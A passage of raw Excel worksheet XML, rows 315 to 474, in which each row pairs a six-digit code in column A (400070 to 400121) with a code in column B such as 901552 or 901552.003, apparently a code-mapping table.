    <row r="315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A315" s="6">
        <v>400070</v>
      </c>
      <c r="B315" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A316" s="6">
        <v>400070</v>
      </c>
      <c r="B316" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A317" s="6">
        <v>400070</v>
      </c>
      <c r="B317" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A318" s="6">
        <v>400070</v>
      </c>
      <c r="B318" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A319" s="6">
        <v>400070</v>
      </c>
      <c r="B319" s="3">
        <v>901569.00100000005</v>
      </c>
    </row>
    <row r="320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A320" s="6">
        <v>400070</v>
      </c>
      <c r="B320" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A321" s="6">
        <v>400070</v>
      </c>
      <c r="B321" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A322" s="6">
        <v>400070</v>
      </c>
      <c r="B322" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A323" s="6">
        <v>400070</v>
      </c>
      <c r="B323" s="3">
        <v>901127</v>
      </c>
    </row>
    <row r="324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A324" s="6">
        <v>400070</v>
      </c>
      <c r="B324" s="3">
        <v>901127.00100000005</v>
      </c>
    </row>
    <row r="325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A325" s="6">
        <v>400070</v>
      </c>
      <c r="B325" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A326" s="6">
        <v>400070</v>
      </c>
      <c r="B326" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A327" s="6">
        <v>400070</v>
      </c>
      <c r="B327" s="3">
        <v>901552.00199999998</v>
      </c>
    </row>
    <row r="328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A328" s="6">
        <v>400070</v>
      </c>
      <c r="B328" s="3">
        <v>901552.00300000003</v>
      </c>
    </row>
    <row r="329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A329" s="6">
        <v>400070</v>
      </c>
      <c r="B329" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A330" s="6">
        <v>400070</v>
      </c>
      <c r="B330" s="3">
        <v>901552.00600000005</v>
      </c>
    </row>
    <row r="331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A331" s="6">
        <v>400070</v>
      </c>
      <c r="B331" s="3">
        <v>901552.00699999998</v>
      </c>
    </row>
    <row r="332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A332" s="6">
        <v>400070</v>
      </c>
      <c r="B332" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A333" s="6">
        <v>400070</v>
      </c>
      <c r="B333" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A334" s="6">
        <v>400070</v>
      </c>
      <c r="B334" s="3">
        <v>901125</v>
      </c>
    </row>
    <row r="335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A335" s="6">
        <v>400070</v>
      </c>
      <c r="B335" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A336" s="6">
        <v>400070</v>
      </c>
      <c r="B336" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A337" s="6">
        <v>400070</v>
      </c>
      <c r="B337" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A338" s="6">
        <v>400070</v>
      </c>
      <c r="B338" s="3">
        <v>901497.00300000003</v>
      </c>
    </row>
    <row r="339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A339" s="6">
        <v>400070</v>
      </c>
      <c r="B339" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A340" s="6">
        <v>400080</v>
      </c>
      <c r="B340" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A341" s="6">
        <v>400080</v>
      </c>
      <c r="B341" s="3">
        <v>901611</v>
      </c>
    </row>
    <row r="342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A342" s="6">
        <v>400080</v>
      </c>
      <c r="B342" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A343" s="6">
        <v>400080</v>
      </c>
      <c r="B343" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A344" s="6">
        <v>400080</v>
      </c>
      <c r="B344" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A345" s="6">
        <v>400080</v>
      </c>
      <c r="B345" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A346" s="6">
        <v>400081</v>
      </c>
      <c r="B346" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A347" s="6">
        <v>400082</v>
      </c>
      <c r="B347" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A348" s="6">
        <v>400083</v>
      </c>
      <c r="B348" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A349" s="6">
        <v>400083</v>
      </c>
      <c r="B349" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A350" s="6">
        <v>400083</v>
      </c>
      <c r="B350" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A351" s="6">
        <v>400090</v>
      </c>
      <c r="B351" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A352" s="6">
        <v>400090</v>
      </c>
      <c r="B352" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A353" s="6">
        <v>400090</v>
      </c>
      <c r="B353" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A354" s="6">
        <v>400090</v>
      </c>
      <c r="B354" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A355" s="6">
        <v>400090</v>
      </c>
      <c r="B355" s="3">
        <v>901584.00199999998</v>
      </c>
    </row>
    <row r="356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A356" s="6">
        <v>400091</v>
      </c>
      <c r="B356" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A357" s="6">
        <v>400091</v>
      </c>
      <c r="B357" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A358" s="6">
        <v>400091</v>
      </c>
      <c r="B358" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A359" s="6">
        <v>400091</v>
      </c>
      <c r="B359" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A360" s="6">
        <v>400092</v>
      </c>
      <c r="B360" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A361" s="6">
        <v>400092</v>
      </c>
      <c r="B361" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A362" s="6">
        <v>400092</v>
      </c>
      <c r="B362" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A363" s="6">
        <v>400092</v>
      </c>
      <c r="B363" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A364" s="6">
        <v>400092</v>
      </c>
      <c r="B364" s="3">
        <v>901584.00199999998</v>
      </c>
    </row>
    <row r="365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A365" s="6">
        <v>400100</v>
      </c>
      <c r="B365" s="3">
        <v>901092</v>
      </c>
    </row>
    <row r="366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A366" s="6">
        <v>400100</v>
      </c>
      <c r="B366" s="3">
        <v>901006</v>
      </c>
    </row>
    <row r="367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A367" s="6">
        <v>400100</v>
      </c>
      <c r="B367" s="3">
        <v>901561</v>
      </c>
    </row>
    <row r="368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A368" s="6">
        <v>400100</v>
      </c>
      <c r="B368" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A369" s="6">
        <v>400100</v>
      </c>
      <c r="B369" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A370" s="6">
        <v>400101</v>
      </c>
      <c r="B370" s="3">
        <v>901092</v>
      </c>
    </row>
    <row r="371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A371" s="6">
        <v>400101</v>
      </c>
      <c r="B371" s="3">
        <v>901052</v>
      </c>
    </row>
    <row r="372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A372" s="6">
        <v>400101</v>
      </c>
      <c r="B372" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A373" s="6">
        <v>400101</v>
      </c>
      <c r="B373" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A374" s="6">
        <v>400102</v>
      </c>
      <c r="B374" s="3">
        <v>901561</v>
      </c>
    </row>
    <row r="375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A375" s="6">
        <v>400102</v>
      </c>
      <c r="B375" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A376" s="6">
        <v>400102</v>
      </c>
      <c r="B376" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A377" s="6">
        <v>400102</v>
      </c>
      <c r="B377" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A378" s="6">
        <v>400102</v>
      </c>
      <c r="B378" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A379" s="6">
        <v>400102</v>
      </c>
      <c r="B379" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A380" s="6">
        <v>400110</v>
      </c>
      <c r="B380" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A381" s="6">
        <v>400110</v>
      </c>
      <c r="B381" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A382" s="6">
        <v>400110</v>
      </c>
      <c r="B382" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A383" s="6">
        <v>400110</v>
      </c>
      <c r="B383" s="3">
        <v>901561</v>
      </c>
    </row>
    <row r="384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A384" s="6">
        <v>400110</v>
      </c>
      <c r="B384" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A385" s="6">
        <v>400110</v>
      </c>
      <c r="B385" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A386" s="6">
        <v>400110</v>
      </c>
      <c r="B386" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A387" s="6">
        <v>400110</v>
      </c>
      <c r="B387" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A388" s="6">
        <v>400110</v>
      </c>
      <c r="B388" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A389" s="6">
        <v>400110</v>
      </c>
      <c r="B389" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A390" s="6">
        <v>400111</v>
      </c>
      <c r="B390" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A391" s="6">
        <v>400111</v>
      </c>
      <c r="B391" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A392" s="6">
        <v>400120</v>
      </c>
      <c r="B392" s="3">
        <v>901087</v>
      </c>
    </row>
    <row r="393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A393" s="6">
        <v>400120</v>
      </c>
      <c r="B393" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A394" s="6">
        <v>400120</v>
      </c>
      <c r="B394" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A395" s="6">
        <v>400120</v>
      </c>
      <c r="B395" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A396" s="6">
        <v>400120</v>
      </c>
      <c r="B396" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A397" s="6">
        <v>400120</v>
      </c>
      <c r="B397" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A398" s="6">
        <v>400120</v>
      </c>
      <c r="B398" s="3">
        <v>901555.00100000005</v>
      </c>
    </row>
    <row r="399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A399" s="6">
        <v>400120</v>
      </c>
      <c r="B399" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A400" s="6">
        <v>400120</v>
      </c>
      <c r="B400" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A401" s="6">
        <v>400120</v>
      </c>
      <c r="B401" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A402" s="6">
        <v>400120</v>
      </c>
      <c r="B402" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A403" s="6">
        <v>400120</v>
      </c>
      <c r="B403" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A404" s="6">
        <v>400120</v>
      </c>
      <c r="B404" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A405" s="6">
        <v>400120</v>
      </c>
      <c r="B405" s="3">
        <v>901074</v>
      </c>
    </row>
    <row r="406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A406" s="6">
        <v>400120</v>
      </c>
      <c r="B406" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A407" s="6">
        <v>400120</v>
      </c>
      <c r="B407" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A408" s="6">
        <v>400120</v>
      </c>
      <c r="B408" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A409" s="6">
        <v>400120</v>
      </c>
      <c r="B409" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A410" s="6">
        <v>400120</v>
      </c>
      <c r="B410" s="3">
        <v>901048</v>
      </c>
    </row>
    <row r="411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A411" s="6">
        <v>400120</v>
      </c>
      <c r="B411" s="3">
        <v>901048.00100000005</v>
      </c>
    </row>
    <row r="412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A412" s="6">
        <v>400120</v>
      </c>
      <c r="B412" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A413" s="6">
        <v>400120</v>
      </c>
      <c r="B413" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A414" s="6">
        <v>400120</v>
      </c>
      <c r="B414" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A415" s="6">
        <v>400120</v>
      </c>
      <c r="B415" s="3">
        <v>901011</v>
      </c>
    </row>
    <row r="416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A416" s="6">
        <v>400120</v>
      </c>
      <c r="B416" s="3">
        <v>901011.00100000005</v>
      </c>
    </row>
    <row r="417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A417" s="6">
        <v>400120</v>
      </c>
      <c r="B417" s="3">
        <v>901052</v>
      </c>
    </row>
    <row r="418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A418" s="6">
        <v>400120</v>
      </c>
      <c r="B418" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A419" s="6">
        <v>400120</v>
      </c>
      <c r="B419" s="3">
        <v>901567</v>
      </c>
    </row>
    <row r="420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A420" s="6">
        <v>400120</v>
      </c>
      <c r="B420" s="3">
        <v>901567.00100000005</v>
      </c>
    </row>
    <row r="421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A421" s="6">
        <v>400120</v>
      </c>
      <c r="B421" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A422" s="6">
        <v>400120</v>
      </c>
      <c r="B422" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A423" s="6">
        <v>400120</v>
      </c>
      <c r="B423" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A424" s="6">
        <v>400120</v>
      </c>
      <c r="B424" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A425" s="6">
        <v>400120</v>
      </c>
      <c r="B425" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A426" s="6">
        <v>400120</v>
      </c>
      <c r="B426" s="3">
        <v>901003.00699999998</v>
      </c>
    </row>
    <row r="427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A427" s="6">
        <v>400120</v>
      </c>
      <c r="B427" s="3">
        <v>901003.00800000003</v>
      </c>
    </row>
    <row r="428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A428" s="6">
        <v>400120</v>
      </c>
      <c r="B428" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A429" s="6">
        <v>400120</v>
      </c>
      <c r="B429" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A430" s="6">
        <v>400120</v>
      </c>
      <c r="B430" s="3">
        <v>901558</v>
      </c>
    </row>
    <row r="431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A431" s="6">
        <v>400120</v>
      </c>
      <c r="B431" s="3">
        <v>901539</v>
      </c>
    </row>
    <row r="432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A432" s="6">
        <v>400120</v>
      </c>
      <c r="B432" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A433" s="6">
        <v>400120</v>
      </c>
      <c r="B433" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A434" s="6">
        <v>400120</v>
      </c>
      <c r="B434" s="3">
        <v>901552.00300000003</v>
      </c>
    </row>
    <row r="435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A435" s="6">
        <v>400120</v>
      </c>
      <c r="B435" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A436" s="6">
        <v>400120</v>
      </c>
      <c r="B436" s="3">
        <v>901552.00600000005</v>
      </c>
    </row>
    <row r="437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A437" s="6">
        <v>400120</v>
      </c>
      <c r="B437" s="3">
        <v>901552.00699999998</v>
      </c>
    </row>
    <row r="438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A438" s="6">
        <v>400121</v>
      </c>
      <c r="B438" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A439" s="6">
        <v>400121</v>
      </c>
      <c r="B439" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A440" s="6">
        <v>400121</v>
      </c>
      <c r="B440" s="3">
        <v>901560.00199999998</v>
      </c>
    </row>
    <row r="441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A441" s="6">
        <v>400121</v>
      </c>
      <c r="B441" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A442" s="6">
        <v>400121</v>
      </c>
      <c r="B442" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A443" s="6">
        <v>400121</v>
      </c>
      <c r="B443" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A444" s="6">
        <v>400121</v>
      </c>
      <c r="B444" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A445" s="6">
        <v>400121</v>
      </c>
      <c r="B445" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A446" s="6">
        <v>400121</v>
      </c>
      <c r="B446" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A447" s="6">
        <v>400121</v>
      </c>
      <c r="B447" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A448" s="6">
        <v>400121</v>
      </c>
      <c r="B448" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A449" s="6">
        <v>400121</v>
      </c>
      <c r="B449" s="3">
        <v>901547.01500000001</v>
      </c>
    </row>
    <row r="450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A450" s="6">
        <v>400121</v>
      </c>
      <c r="B450" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A451" s="6">
        <v>400121</v>
      </c>
      <c r="B451" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A452" s="6">
        <v>400121</v>
      </c>
      <c r="B452" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A453" s="6">
        <v>400121</v>
      </c>
      <c r="B453" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A454" s="6">
        <v>400121</v>
      </c>
      <c r="B454" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A455" s="6">
        <v>400121</v>
      </c>
      <c r="B455" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A456" s="6">
        <v>400121</v>
      </c>
      <c r="B456" s="3">
        <v>901554</v>
      </c>
    </row>
    <row r="457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A457" s="6">
        <v>400121</v>
      </c>
      <c r="B457" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A458" s="6">
        <v>400121</v>
      </c>
      <c r="B458" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A459" s="6">
        <v>400121</v>
      </c>
      <c r="B459" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A460" s="6">
        <v>400121</v>
      </c>
      <c r="B460" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A461" s="6">
        <v>400121</v>
      </c>
      <c r="B461" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A462" s="6">
        <v>400121</v>
      </c>
      <c r="B462" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A463" s="6">
        <v>400121</v>
      </c>
      <c r="B463" s="3">
        <v>901565.00100000005</v>
      </c>
    </row>
    <row r="464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A464" s="6">
        <v>400121</v>
      </c>
      <c r="B464" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A465" s="6">
        <v>400121</v>
      </c>
      <c r="B465" s="3">
        <v>901074</v>
      </c>
    </row>
    <row r="466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A466" s="6">
        <v>400121</v>
      </c>
      <c r="B466" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A467" s="6">
        <v>400121</v>
      </c>
      <c r="B467" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A468" s="6">
        <v>400121</v>
      </c>
      <c r="B468" s="3">
        <v>901491</v>
      </c>
    </row>
    <row r="469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A469" s="6">
        <v>400121</v>
      </c>
      <c r="B469" s="3">
        <v>901491.00100000005</v>
      </c>
    </row>
    <row r="470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A470" s="6">
        <v>400121</v>
      </c>
      <c r="B470" s="3">
        <v>901491.00199999998</v>
      </c>
    </row>
    <row r="471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A471" s="6">
        <v>400121</v>
      </c>
      <c r="B471" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A472" s="6">
        <v>400121</v>
      </c>
      <c r="B472" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A473" s="6">
        <v>400121</v>
      </c>
      <c r="B473" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A474" s="6">
        <v>400121</v>
      </c>
      <c r="B474" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
